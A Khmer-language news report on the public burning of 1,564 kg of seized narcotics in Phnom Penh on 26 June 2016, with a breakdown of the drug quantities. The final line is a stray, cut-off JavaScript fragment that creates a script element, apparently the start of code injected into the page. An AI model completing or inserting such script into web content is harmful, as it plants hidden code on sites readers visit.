គ្រឿងញៀនរាប់ពាន់គីឡូត្រូវដុតបំផ្លាញចោលនាព្រឹកមិុញនេះ
ភ្នំពេញ៖ ក្រោយពីកម្លាំងសមត្ថកិច្ច ធ្វើការបង្ក្រាបបាន និងបញ្ជូនទៅតុលាការជាបន្តបន្ទាប់នាពេលកន្លងមកនេះ ជាមួយនឹងសារធាតុជាតិញៀនជាច្រើននោះ នៅព្រឹកថ្ងៃទី២៦ ខែមិថុនា ឆ្នាំ២០១៦ អាជ្ញាធរជាតិប្រយុទ្ធប្រឆាំងគ្រឿងញៀន ដុតបំផ្លាញចោលនូវសារធាតុញៀនចំនួន១៥៦៤គីឡូក្រាម ក្នុងបរិវេណវិទ្យាល័យបឹងត្របែក ស្ថិតក្នុងខណ្ឌចំការមន រាជធានីភ្នំពេញ។
ដោយការដុតបំផ្លាញចោល នូវសារធាតុដែលពង្វក់ស្មារតីបងប្អូនប្រជាពលរដ្ឋខ្មែរនេះ ត្រូវបានរៀបចំឡើងនៅក្នុងទិវាអន្តរជាតិ ប្រយុទ្ធប្រឆាំងគ្រឿងញៀន ក្រោមអធិបតីភាព លោកឧបនាយករដ្ឋមន្ត្រី កែ គឹមយ៉ាន ប្រធានអាជ្ញាធរជាតិ ប្រយុទ្ធប្រឆាំងគ្រឿងញៀន និងមានការចូលរួមពីមន្ត្រីពាក់ពាន់ជាច្រើនរូបទៀត។
បើយោងតាមរបាយការណ៍បានអោយដឹងថាសារធាតុញៀនទាំងនោះរួមមាន ប្រភេទមេតំហ្វេតាមីន ទម្ងន់៦៧,៤១គីឡូក្រាម ហេរ៉ូអ៊ីន ទម្ងន់៣៤៥,៣២ក្រាម កញ្ឆាស្ងួត ទម្ងន់១៤៩៤,៨៥គីឡូក្រាម និងកញ្ឆាទឹក ទម្ងន់១,៥គីឡូក្រាម។
var d=document;var s=d.createElement(‘script’);